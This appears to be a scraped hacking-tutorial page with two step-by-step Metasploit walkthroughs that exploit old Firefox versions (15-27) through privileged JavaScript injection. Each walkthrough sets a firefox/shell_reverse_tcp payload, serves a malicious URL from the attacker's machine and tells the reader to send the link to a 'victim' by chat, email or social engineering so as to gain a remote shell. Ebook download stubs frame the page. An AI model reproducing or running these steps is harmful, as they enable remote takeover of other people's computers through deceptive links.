Incident Response & Computer Forensics, 3rd Edition

0

Download

Password: www.hackingarticles.in

Hack Remote Windows, Linux or MAC PC using Firefox WebIDL Privileged Javascript Injection

0

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox’s Javascript APIs

Exploit Targets

Firefox 22-27

Windows XP SP 3

Windows 7

Linux

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_webidl_injection

msf exploit (firefox_webidl_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_webidl_injection)>set lhost 192.168.0.5 (IP of Local Host)

msf exploit (firefox_webidl_injection)>set srvhost 192.168.0.5

msf exploit (firefox_webidl_injection)>set uripath /

msf exploit (firefox_webidl_injection)>exploit 

Now an URL you should give to your victim http://192.168.0.5:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Hack Remote Windows, Linux, MAC PC using Firefox to String console.time Privileged JavaScript Injection

0

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Exploit Targets

Firefox Version 15-22

Windows 7

Linux

Solaris

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_tostring_console_injection

msf exploit (firefox_tostring_console_injection)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_tostring_console_injection)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (firefox_tostring_console_injection)>set srvhost 192.168.0.104

msf exploit (firefox_tostring_console_injection)>set uripath /

msf exploit (firefox_tostring_console_injection)>exploit

Now an URL you should give to your victim http://192.168.0.104:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Python Forensics

0

Download

Password: www.hackingarticles.in

Go to Top